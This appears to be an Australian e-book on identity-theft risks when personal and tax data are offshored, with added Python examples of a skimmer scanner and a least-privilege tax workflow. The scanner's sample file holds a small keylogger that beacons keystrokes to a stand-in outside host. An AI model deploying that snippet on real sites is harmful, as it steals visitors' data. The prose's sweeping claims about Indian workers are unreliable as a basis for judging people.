When Australian businesses send jobs offshore to India, it isn't just the jobs that go. Your sensitive personal information, including your driver's licence, signature, passport, earnings, debts, assets … and personal account details, is also transferred offshore. Australian privacy laws don't apply in India or in many other developing countries.
In the USA, Senator John Kerry's 2004 campaign against offshoring jobs came at a time when the US economy was struggling to create employment. Such a message carries exactly the same punch in today's Australia, with the spectre of people losing their jobs.
The threat of identity theft from offshoring personal data is an even greater issue. Identity theft affects a broad cross-section of the population, not just the unemployed or those about to lose their jobs.
Modern business has become increasingly borderless. The internet revolution and the reduction in international trade barriers have allowed business to globalise and regions to specialise. For example, an Australian company could have its customer call centre located in India, its product designed in Europe, built in China, and managed from Sydney or Melbourne. The company's business units must share information about customers, employees and suppliers.
Overseas business processing centres are now being used to handle sensitive customer data. For example, tax preparation, credit card applications, mortgages, insurance claims and help desk services are business areas currently being offshored for processing in other countries. Australians are losing their jobs as the work they used to do is transferred to another country.
In a recent national Australian privacy phone-in, many Australians expressed real concerns about Australian companies sending their customers', vendors' and employees' personal information to overseas call centres. Consumers believe their personal information must be protected overseas as it is in Australia. Put simply, if you deal with an Australian company, you do not want that company passing your details overseas, where privacy laws are weak. You have a right to know, when purchasing goods online, whether your payment details are being sent overseas. Australian consumers view this as a huge security risk.
Case #1: How can your private data be leaked?
Did you know that someone you trust could inadvertently leak your personal financial details?
Let me illustrate how this can happen with a real-life story. The people's names have been changed to prevent identification.
Bill, an accountant, was preparing John's 2005 income tax return. During their conversation, John and Bill discussed various private taxation and financial matters. The conversation changed when Bill spoke about the planned changes to the accounting practice in the coming financial year.
The practice intended to "offshore" its routine tax preparation work to a business process outsourcing (BPO) vendor located in India. Bill's local staff would scan John's personal data into Bill's local computer system, and the Indian workers would access Bill's system remotely to prepare John's tax return.
Bill planned that this change in business processing procedures would allow the practice to eliminate jobs. The lower staff costs would increase profits for the practice and provide financial savings for the client.
Bill said he was forced to make these changes so that he could compete in the Australian marketplace. He assured John about the quality of the Indian staff, claiming that the staff at the BPO were as good as, if not better than, the staff currently employed in the practice. Bill regretted the loss of jobs from the accounting practice but maintained that "business is business" … they really had no other choice!
John was concerned, but he trusted Bill's judgment and agreed to Bill's proposal. There was a catch to this proposal: John's personal financial details could be sold or resold without his knowledge or consent.
Unfortunately for John, a rogue staff member at the BPO vendor sold his and many other tax clients' personal details to third parties. There was nothing the Australian police could do about the data loss. John's only recourse was to take civil action against Bill's accounting practice!
Case #2: How your new website could be hacked by offshore web programmers
Frank had engaged Max to build a new website for his real estate business. Frank had known Max personally for a long time and trusted him. Max's web design business was booming: Max was offering low-cost, high-quality websites that completely undercut his Australian competitors.
The problem was that Max was unaware that one of his offshore web developers was corrupting the new websites by inserting malicious code. This code hid a keylogger inside the site. As customer, vendor or employee records were entered, the keylogger recorded the personal data, including names, addresses, bank accounts, credit card numbers and e-mail addresses. The captured data was then transmitted back to the web developer, who on-sold it to data brokers. Eventually, some of Max's customers became victims of identity theft!
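The keylogger in Case #2 had two tell-tale properties that a code review of the delivered site could have caught: it hooked what visitors typed, and it sent that data to a host the site had no business talking to. The following is an added example (it is not code from the e-book, from Max's business, or from any web developer it describes) of a triage scan over the JavaScript a developer delivers, run before the site goes live. It assumes the site owner keeps an allowlist of hosts the site is permitted to contact (the `example-realestate.com.au` names are assumptions), and the two sample scripts are constructed for illustration. The patterns are heuristics for flagging files a human should read, not proof of malice.

```python
"""Triage check for injected form-skimming code in delivered web assets.

Added example, not code from the original e-book or from any web developer it
describes. Assumptions: the site owner keeps an allowlist of hosts the site is
permitted to contact, and the delivered JavaScript can be scanned offline
before deployment. The patterns are heuristics for triage, not proof.
"""
import re
from typing import Dict, List, Optional

# Assumed allowlist: hosts the real-estate site is expected to talk to.
ALLOWED_HOSTS = {"example-realestate.com.au", "www.example-realestate.com.au"}

# Code that reads what a visitor types or submits.
INPUT_CAPTURE = re.compile(
    r"addEventListener\(\s*['\"](?:keydown|keyup|keypress|input|submit|change)['\"]"
    r"|\bon(?:keydown|keyup|keypress|submit)\s*="
    r"|new\s+FormData\s*\("
    r"|\.value\b"
)
# Code that can move data off the page.
NETWORK_SEND = re.compile(
    r"\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon|new\s+Image\s*\("
    r"|\.src\s*=|WebSocket\s*\("
)
# Encoding commonly used to pack captured data into a URL or request body.
ENCODING = re.compile(r"\b(?:btoa|encodeURIComponent|JSON\.stringify)\s*\(")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def scan_script(path: str, source: str) -> Optional[Dict]:
    """Return a finding for one script, or None if nothing looks suspicious.

    A script is flagged when it both captures input and sends data, or when it
    contacts any host outside the allowlist (a keylogger must report somewhere).
    """
    captures = bool(INPUT_CAPTURE.search(source))
    sends = bool(NETWORK_SEND.search(source))
    unknown_hosts = sorted({h.lower() for h in URL_HOST.findall(source)} - ALLOWED_HOSTS)
    reasons: List[str] = []
    if captures and sends:
        reasons.append("captures user input and performs a network send")
    if unknown_hosts:
        reasons.append("contacts host(s) outside allowlist: " + ", ".join(unknown_hosts))
    if captures and sends and ENCODING.search(source):
        reasons.append("encodes captured data before sending")
    return {"path": path, "reasons": reasons} if reasons else None


def scan_bundle(files: Dict[str, str]) -> List[Dict]:
    """Scan every delivered script and collect the findings."""
    findings = []
    for path, source in files.items():
        finding = scan_script(path, source)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample deliverable (not real site code): a benign form validator
# and a helper file with a hidden keylogger that beacons keystrokes to a third party.
SAMPLE_BUNDLE = {
    "js/validate.js": """
        document.querySelector('#enquiry').addEventListener('submit', function (e) {
          if (!document.querySelector('#email').value.includes('@')) { e.preventDefault(); }
        });
    """,
    "js/ui-helpers.js": """
        document.addEventListener('keyup', function (e) { window.__k = (window.__k || '') + e.key; });
        setInterval(function () {
          new Image().src = 'https://stats-cdn.example.net/p.gif?d=' + btoa(window.__k);
        }, 5000);
    """,
}

if __name__ == "__main__":
    for f in scan_bundle(SAMPLE_BUNDLE):
        print(f["path"])
        for r in f["reasons"]:
            print("  -", r)
```

Run against the sample bundle, the validator passes (it reads a form field but never sends anything) while `js/ui-helpers.js` is flagged on all three counts. The allowlist check is the one worth keeping even if the other heuristics prove noisy: a legitimate site rarely needs to contact a host its owner has never heard of, so any unexpected destination in delivered code is a question to put to the developer before launch.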
The problem of data leaks in overseas locations
Millions of innocent consumers around the world have had their personal details leaked because someone they trusted failed to secure their data. In June 2005, around forty million credit card holders learned of a security breach at CardSystems Solutions, a US company that processes credit card transactions on behalf of card issuers. Their card account details had been stolen. The exposed data included card numbers and the security codes printed on the cards, which a processor is not supposed to retain at all.
The CardSystems incident illustrates the massive opportunities for identity theft. Highly sensitive personal information of customers, vendors and employees is currently being passed to overseas call centres and BPOs. Rogue employees are selling and reselling this private data to third parties … and there's nothing you can do about it!
In 2005, the ABC's "Four Corners" television program showed how easy it is to purchase personal data through overseas "data harvesting" brokers. An undercover reporter posed as an agent seeking to on-sell the data. The data had originally been stolen by relatively low-skilled staff employed by an Indian BPO. In 2005, many developing countries, including India, did not require third-party BPO providers to undergo data protection audits.
The "Four Corners" program emphasised that the data thefts occurred as part of outsourced arrangements: the security breaches occurred within vendor companies that provided contracted business services to corporate clients. This is no accident. Outsourcing fundamentally changes personnel control. It replaces the day-to-day supervision of staff with arm's-length supervision of an external vendor through an "outcomes-based" contract.
Cases of Data Misuse & Fraud in Indian Business Processing Organizations
There have been a number of incidents of data misuse by staff of Indian business service organisations.
In June 2005, Interpol investigated a worker at Infinity eSearch. A reporter from The Sun claimed that the employee had sold him account details for 1,000 Barclays Bank customers. The account holders' secret passwords, addresses, phone numbers and passport details were sold for $US 8,000.
To put this in perspective, the average income of Indian workers is about $US 470 p.a. Indian call centre employees receive a salary of about $US 12,000 p.a., exceeding the salaries of many early-career Indian teachers, accountants or lawyers.
There are inherent flaws in placing sensitive information in the hands of offshore employees in a developing country. The temptation to make what is, in local currency, a vast amount of money by on-selling information to unscrupulous buyers is great. This is particularly so when the exchange rate makes the purchase cost in the Western country minimal.
In 2005, the Amicus union (UK) issued general warnings about the state of data protection in India. Companies that offshore jobs need to weigh anticipated cost savings and profits against this risk. Is cutting costs more important than maintaining consumer confidence? Companies that forget that retaining existing customers is much easier than finding new ones often fail in the medium term.
In April 2005, Indian police arrested several men who had worked at an MphasiS call centre serving Citibank. The former MphasiS employees were charged with misusing financial data and stealing from Citibank customers. They had obtained customers' account details, logged into Citibank's online banking system and transferred $425,000 out of the customers' accounts.
Additional cases of Indian employees misusing data include:
In 2003, Indian employees working for Ohio-based Heartland Information Services blackmailed the company, threatening to release confidential records;
In 2003, an Indian programmer working for Geometric Software Solutions tried to sell source code belonging to SolidWorks, a US client of the company, to another US-based company;
In 2004, an employee working at a call centre in Noida, India, used an American's credit card to buy extensive electronics equipment from Sony; and
In 2005, a series of events similar to The Sun incident occurred: sensitive personal data was allegedly sold to undercover reporters from the Australian Broadcasting Corporation for less than $US 8 per person.
Reports of fraud and data theft in India have increased in recent years. Any misuse of sensitive personal data by offshore service providers is a serious threat to the success of globalisation.
BPO vendors are contractually obliged to protect the sensitive personal information in their clients' data. In practice, outsourced data security controls rarely work well. They may be manageable for simple services where data loss has minimal consequences. However, outsourcing data controls for complex business services has serious consequences.
Many Australian business managers do not appreciate the risks of outsourcing their business processing operations. In this eBook, we draw on years of practical experience with outsourced operations to alert readers to some of these risks.
Experts agree that when your personal data is processed offshore there is a very high risk of it being compromised. This is particularly so where either the sending or the receiving country DOES NOT HAVE adequate legal and system protections!
"The issues of data theft and outsourcing are intimately connected because BPO services can only be supplied by lower-cost vendors if the client hands over its critical data to the vendor in (easily stolen) electronic form. This electronic data is relatively easily accessed (and copied) by the vendor's front-line operators, effectively white collar "shop floor workers" with limited loyalty to the company." Anne Rouse and David Watson Monash University Business Review, Volume 1, Issue 2 2005
The main driver for offshoring accounting practices' client taxation work is the reduction in practice costs! Unfortunately, data protection is often not considered! Here is a list of the personally identifiable information included in your Australian tax return:
Your Tax File Number;
Your name;
Your address;
The name of your partner and their Tax File Number;
Your date of birth;
Your income;
Your expenses; and
Investments, including shares, properties, cash and superannuation.
… and much, much more!
This is your personal financial data; it is private, and it confirms your identity. When your Australian tax return is being prepared, you are required to provide receipts for any expenditure you are claiming. Receipts provide third-party confirmation of your identity!
Australian taxpayers should also be very concerned….
Outsourcing tax preparation services to an overseas company in India or any other developing country is causing concern to many security-conscious Australians. The burning question is this: has the overseas company implemented adequate security measures to prevent fraud and identity theft by employees and outsiders?
The Australian taxpayer does not have a direct contract with the offshore BPO. Your legal rights are largely determined by the contract you have with your accountant. Your accountant may have a contract with the offshore BPO. If the BPO has a direct presence in Australia, i.e. a physical office, then the accountant can take direct legal action against the BPO in Australian courts. Otherwise, the parties would have to settle in the courts of the country where the BPO resides.
In Australia, the transfer of sensitive data to another country generally requires consent. If you consent to your data being offshored, you do so at your own risk. If your sensitive data has been offshored without your express consent, the sender may be held liable under Australian law. Accountants who "offshore" client data currently DO NOT NEED client approval. However, if clients' data is leaked, they will face lawsuits and damage to their brand.
Data security loopholes exist where some businesses are exempt from privacy laws. For example, Australia exempts small businesses with a turnover of less than $3 million from its privacy laws. An Australian suburban accounting practice or software developer could therefore offshore your sensitive personal data to a low-wage country like India while being exempt from Australia's privacy laws! This loophole allows small businesses to send your personal financial data to an overseas country where privacy is unregulated … a practice that could expose you to identity fraud!
Virtually any outsourced business process may involve privacy violations arising from mistakes or negligence at any stage: the receipt, custody, processing, storage, access, encryption and transmission of confidential records of individuals. The weakest point in the chain could be a human problem, a data problem, an encryption problem, a policy problem or a customer service problem.
Further, most Australian suburban accounting practices have no experience with international operations! They have not encountered the extensive data security issues that arise when they offshore their clients' tax returns to BPOs in other countries.
Outsourcing vendors argue that clients' data is safe if the vendor's staff are allowed access to the accountant's system only through a strictly controlled workflow procedure. While this is possible, it is costly to implement, and controls stringent enough to work would defeat the whole purpose of offshoring.
For example, how would a business processing vendor perform client reconciliations without access to the client's raw financial data? The proposal simply does not make sense! The vendor would need complete read/write access to the client's raw data, resulting in very high data security risks for the client!
In my opinion, the Australian accounting profession and web developers have not properly considered the risks of offshoring and the consequences of data leaks! If you allow your sensitive data to be sent offshore for processing, you do so at your own risk … unscrupulous operators download and sell your private information to criminal gangs!
The question you have to ask yourself is this: how secure do you feel about your sensitive financial data being transmitted to a low-wage country by your accountant? Would you be happy to find out that someone in India was accessing your details on your accountant's client accounting system? Did you know that this could be happening to you NOW, without your knowledge or consent?
The Future of Offshoring
The most commonly outsourced finance and accounting functions are tax consulting and payroll, according to a survey of senior US executives by Ross Research. Recently there have been predictions that finance and accounting functions will become the most widely outsourced business processes in the next few years. However, there are certain finance and accounting functions that Ross Research survey respondents said they would NEVER outsource or offshore, including:
Financial Management Activities: operating budgets/forecasts, capital investments, treasury functions, equity financing/debt, cash management, budgeting, performance analysis and investor relations.
General Accounting: general ledger, cost accounting/revenue, equity accounting/debt, statutory accounting, fixed asset accounting and business unit accounting.
Financial Reporting and Accounting: tax, accounts payable/receivable, leases, billing/customer invoicing and customer credit/expense reporting.
Questions you should ask if you intend to outsource or offshore your service business
In my professional experience, I have maintained financial systems, which includes ensuring data integrity. It is important that both internal and external system controls are present for sensitive financial transactions within Australian companies.
I have also worked on helpdesks in outsourced companies. You could say I have seen how outsourcing works from both sides of the fence! While I have never been employed in an accounting practice, I have been a member of the accounting profession for over 30 years.
Here are ten tough questions that you should ask if you intend to outsource your business operations. Your clients have every right to have these questions answered satisfactorily. If you cannot answer them, then you shouldn't be outsourcing:
Where will my data and applications physically reside? What compliance and security protections are enforced for those locations? Does the data go to any entity outside the vendor? Does it ever leave the country? You should dig deeper and demand the same level of security for your sensitive data as if the vendor were handling its own. Blind trust is not good enough!
Will my personal data be stored on dedicated or shared infrastructure? If shared, how does the vendor maintain separation between your data, the data of your accountant's other clients and the data of other accountants' clients? How does the vendor maintain isolation and privacy of your sensitive personal data? You should demand an understanding of the security controls the BPO has in place to protect your sensitive data. The BPO should be able to demonstrate these controls to you.
Is the vendor running intrusion detection or intrusion prevention on the network? This has been a compliance requirement for some time now, and most vendors should be able to tick the box for perimeter intrusion detection technology.
Is the vendor using data encryption? While the vendor will be primarily concerned with demonstrating cost reduction, you need to see that your personal data is safe from attackers. Technologies like full-disk encryption, media encryption, device firewalls and anti-malware must be compulsory.
What is the service level agreement for updating security policies and protections when new security threats arise? Most outsourcing providers will have service level agreements defined. However, you must check their references to ensure that the vendor can prove it delivers as agreed. Further, it should not price-gouge if your system change requests exceed your monthly quota.
How often does the vendor update firewall rules and policies? Security policies and protections must be updated frequently to stay ahead of security threats.
What insurance coverage does the vendor have in the event of a data security breach? What is its incident response plan and process? No security vendor assumes the risk of a full security breach; they do, however, provide service level agreements to mitigate risk. Any outsourcing agreement should contain specific definitions of the liability of all parties.
What cyber forensics capabilities are there? Security response and business process are as important as the ability to manage security policies effectively.
How does the vendor stay in touch with the broader security community, and how does it receive updates? An outsourcing vendor should demonstrate that it is plugged in to the broader community and has multiple data feeds for new threats, viruses and other malicious code.
What is my ability to get out of the contract? Vendors naturally try to lock clients in to long-term, five-year-plus engagements. Until the vendor has demonstrated that it treats your data security and the protection of your business as mission critical, long-term contracts are higher risk.
Australian Cross Border Privacy Laws give greater certainty for Australians
Australians are very concerned about their personal information being sent or held overseas without their knowledge and consent.
In 2008, the Australian Law Reform Commission's (ALRC) president, Professor David Weisbrot, said:
"This unease appears to reflect a general feeling by people that they are losing control over something deeply personal, with little ability to do anything about it, and few remedies if anything goes wrong overseas." ALRC Media Briefing - New Cross-Border Privacy Laws-Greater Certainty For All Australians.
Major Australian banks and credit card companies, which handle your personal information, often conduct their "back office" processing in data centres located overseas. However, these large companies have extensive financial and system controls built in to protect your data from fraudulent use.
The internet allows you to purchase goods and services from websites hosted by overseas companies, and you'll probably pay for those goods and services using a credit card. For example, this e-book was written by an Australian author; the copyright is owned by an Australian company, Webmarketing Technology Pty Ltd; the website is hosted in the USA; and your credit card purchase was processed by PayPal, a US-based company with Australian operations. The process flow for this simple purchase involves your personal information flowing across Australian and US jurisdictions. There is identity checking, credit verification, data processing, stock checking and shipping … all handled in different countries.
Professor Les McCrimmon, the Commissioner in charge of the Privacy Inquiry, said that:
"While the Privacy Act provides some protection for personal information transferred to another country by businesses, it does not apply to government agencies-and there are general concerns about whether the law currently provides an adequate level of protection."
Australian businesses want to be able to choose the most effective and cost-efficient means of storing and processing their customer data. This often means transferring it overseas. Businesses don't want to be forced to seek customer consent every time a transaction is processed.
"Businesses and governments promoting the economic benefits of efficient information handling and increasing access to global markets for trade and labour need a framework that can facilitate cross-border data flows, while providing individuals with a level of assurance that this will not compromise the security or privacy of their personal information," Professor McCrimmon said.
In its report For Your Information: Australian Privacy Law and Practice, the ALRC recommended a new approach to cross-border data flows. The aim is to give Australian businesses and individuals greater certainty, while ensuring adequate protection of your privacy alongside the business need to transfer and store customer information.
The ALRC recommends that any government agency or business that transfers your personal information outside Australia must always remain responsible for the protection of that information. This ensures that you can report breaches to the Australian privacy regulator and seek redress from the party that leaked your data.
There are three specific circumstances in which a business is not responsible. These are when:
The agency or organisation reasonably believes that the privacy protections in the receiving country are of a similar standard to Australia's;
The individual consents to the transfer after being expressly advised by the company; the consequence of providing this consent is that the business will no longer be held responsible for data leaks; or
A government agency is 'required or authorised by law' to transfer your personal information.
These qualifications will allow Australian businesses to deal with any liability that may arise through the commercial contracts signed by the contracting parties. Government agencies will be allowed to transfer information overseas when they are required to do so by law, for example in extradition proceedings or public health emergencies.
For more information about cross-border data flow see Chapter 31 of For Your Information: Australian Privacy Law and Practice (ALRC 108, 2008).
The USA Experience in Offshoring Tax Preparation
In 2010, more than 1 million US taxpayers will have their income tax returns prepared by companies that outsource the work to India. It is a very disturbing fact that these taxpayers are not told that their private tax and financial documents can be viewed on computer screens halfway around the world.
"Taxpayers should have the right to say 'no' to being exposed to the risks of identity theft and fraud. Security flaws in offshore tax preparation encourage cyber terrorism by those who would victimize every family in our country. This situation is a clear and present danger to the United States and its citizens today." - Steven K. Ladd, CEO, Copanion, Inc.
"Offshore tax preparation represents a very real danger for the United States and its citizens. Many taxpayers have trusted a US tax preparer with their most personal and confidential financial information, so they are innocently unaware of being vulnerable to identity theft and fraud when their returns are actually processed in India," according to Steven K. Ladd, CEO, Copanion, Inc., a software developer serving the accounting industry.
Steven Ladd is a former Fortune 500 executive. He appreciates the advantages of outsourcing tax preparation services to offshore companies: lower staff costs and shorter tax return preparation cycle times … which in turn mean increased profits.
"That is the upside of offshore outsourcing," Ladd said. "But I am also aware of the considerable risks that result from offshore tax preparation. I know that because I am also chairman of a New Hampshire accounting firm that considered outsourcing tax work to India to help manage our busy tax season. The president of our firm, a CPA who is a veteran of 25 tax seasons, and I traveled to India to inspect resources there. We held more than 60 hours of face-to-face meetings with outsourcing firms both large and small, and we were shocked at the lack of adequate security present at all of them." he said.
"We judged the risks for our clients to be too great, so we kept everything in-house," said Ladd. "We agree with IRS Commissioner Mark Everson and US Representative Ed Markey that American taxpayers must be protected from these risks. Offshore outsourcing risks the identity and financial security of taxpayers who may unknowingly be put in jeopardy."
This is not an exaggeration. Most American taxpayers wouldn't give telemarketers their social security numbers. Yet their most intimate personal and financial information has been released by US public accountants to be processed by staff employed in overseas firms.
USA taxpayers should be very concerned…..
Employees of offshore tax preparation companies can view individual taxpayers' details. What they can see should be limited by the level of access needed to perform their role; in other words, they should be given only the minimum access required to do their job. Ideally, a strict workflow procedure would be used to automate the complete tax preparation process.
Ladd observed that the taxpayer data a BPO employee could see included the taxpayer's full name, date of birth, residential and business addresses, social security number (USA only), phone numbers, e-mail addresses, wages, bank, brokerage and mutual fund statements. They could even see the numbers of the taxpayer's checking and savings accounts.
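What "minimum access" and a "strict workflow procedure" look like in practice is easier to judge from a concrete design than from the phrase. The following is an added example, not code from the e-book, from Copanion, or from any BPO: it shows an on-shore system keeping the full client record (the identifiers listed earlier on this page: Tax File Number, name, address, date of birth, partner details, bank account) and releasing to the offshore preparer only the figures the return actually needs, under an opaque client reference, with every access logged and the result re-identified on-shore. The field names, the sample client and the one-line tax calculation are constructed for illustration; whether a real practice can afford to run its workflow this way is the question the surrounding text raises, and the example does not settle it.

```python
"""Least-privilege hand-off for offshored tax preparation.

Added example; it is not code from the original e-book or from any BPO.
Assumptions: the practice runs an on-shore system that keeps the full client
record, the offshore preparer only ever receives a pseudonymised working copy,
and the field names, sample client and tax calculation are constructed.
"""
import secrets
from datetime import datetime, timezone
from typing import Dict, List

# Identifiers the page lists as present on a tax return. None of them is
# needed to compute the figures, so none of them leaves the on-shore system.
DIRECT_IDENTIFIERS = {"tfn", "name", "address", "date_of_birth",
                      "partner_name", "partner_tfn", "bank_account"}
# What a preparer genuinely needs: the financial figures.
WORKING_FIELDS = {"income", "expenses", "investments", "superannuation"}

# Constructed sample record (not a real person).
SAMPLE_CLIENT = {
    "tfn": "123 456 789", "name": "J. Citizen", "address": "1 Example St, Sydney",
    "date_of_birth": "1970-01-01", "partner_name": "A. Citizen",
    "partner_tfn": "987 654 321", "bank_account": "062-000 12345678",
    "income": 85000, "expenses": 12000, "investments": 40000, "superannuation": 150000,
}


class OnshoreVault:
    """Holds complete records on-shore and releases role-specific views only."""

    def __init__(self):
        self._records: Dict[str, dict] = {}
        self.audit: List[dict] = []

    def add(self, record: dict) -> str:
        # Random, non-reversible reference: the preparer sees this, never the TFN.
        token = secrets.token_hex(8)
        self._records[token] = dict(record)
        return token

    def working_copy(self, token: str, role: str) -> dict:
        """Return the minimum view for the role and record who saw which fields."""
        record = self._records[token]
        if role == "offshore_preparer":
            view = {k: v for k, v in record.items() if k in WORKING_FIELDS}
        elif role == "onshore_accountant":
            view = dict(record)
        else:
            raise PermissionError(f"role {role!r} has no access")
        self.audit.append({
            "ts": datetime.now(timezone.utc).isoformat(),
            "role": role, "client_ref": token, "fields": sorted(view),
        })
        return {"client_ref": token, **view}

    def reidentify(self, token: str, prepared: dict) -> dict:
        """Join the preparer's figures back to the real identity, on-shore only."""
        record = self._records[token]
        return {"name": record["name"], "tfn": record["tfn"], **prepared}


def prepare_return(view: dict) -> dict:
    """Offshore side. Refuses to work on anything carrying direct identifiers,
    so a mis-configured export fails loudly instead of leaking quietly."""
    leaked = set(view) & DIRECT_IDENTIFIERS
    if leaked:
        raise ValueError(f"working copy contains identifiers: {sorted(leaked)}")
    # Constructed, simplified calculation: taxable income = income - expenses.
    return {"client_ref": view["client_ref"],
            "taxable_income": view["income"] - view["expenses"]}


def run_workflow(client: dict) -> dict:
    """End to end: on-shore vault -> offshore preparer -> on-shore re-identification."""
    vault = OnshoreVault()
    token = vault.add(client)
    offshore_view = vault.working_copy(token, "offshore_preparer")
    prepared = prepare_return(offshore_view)
    final = vault.reidentify(token, prepared)
    return {"final": final, "audit": vault.audit, "offshore_view": offshore_view}


if __name__ == "__main__":
    print(run_workflow(SAMPLE_CLIENT))
```

Two design points matter more than the code. First, the control is enforced on the on-shore side: the preparer's view is built from an allowlist of fields, so adding a new identifier to the record cannot accidentally widen what is exported. Second, the offshore step checks its own input and refuses identifiers, which turns a silent leak into a visible failure. The audit entries are what the "ten tough questions" later on this page are really asking the vendor for: who saw which fields of which client, and when.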
"This information is the ultimate pot of gold for an identity thief," Ladd emphasized. "Tax returns are road maps to individuals' identities and assets. Unprotected as they are in the offices of most offshore tax preparers, American taxpayers' tax returns are like an exposed wallet just waiting to be lifted by a career pickpocket. As a nation ever vigilant against terrorism, we must guard against those who would steal our identities, injure our economy and threaten our national security. When taxpayers realize what is happening to their information, offshore outsourcing may become as big an issue as the aborted Dubai ports deal."
US taxpayers' personal data is NOT protected under US federal law once it is electronically transferred to another country and stored on computer servers in that country. If the taxpayer's private data is subsequently leaked from those servers to a third party, then that country's law applies. The US taxpayer's rights are determined by the terms of the contract between the US company and the offshore BPO. They could take legal action against the US tax preparer, who in turn would take legal action against the BPO.
Mr Ladd testified at a 2006 IRS hearing in Washington, DC. He supports tougher regulations requiring taxpayers' express written consent before their tax preparation work can be outsourced. Mr Ladd has also proposed that a stronger, specific warning be given to taxpayers about the risks of sending taxpayer information to preparers located outside the USA.
Australian taxpayers whose accounting and tax return preparation is offshored to another country face exactly the same issues as US taxpayers.
What's Next?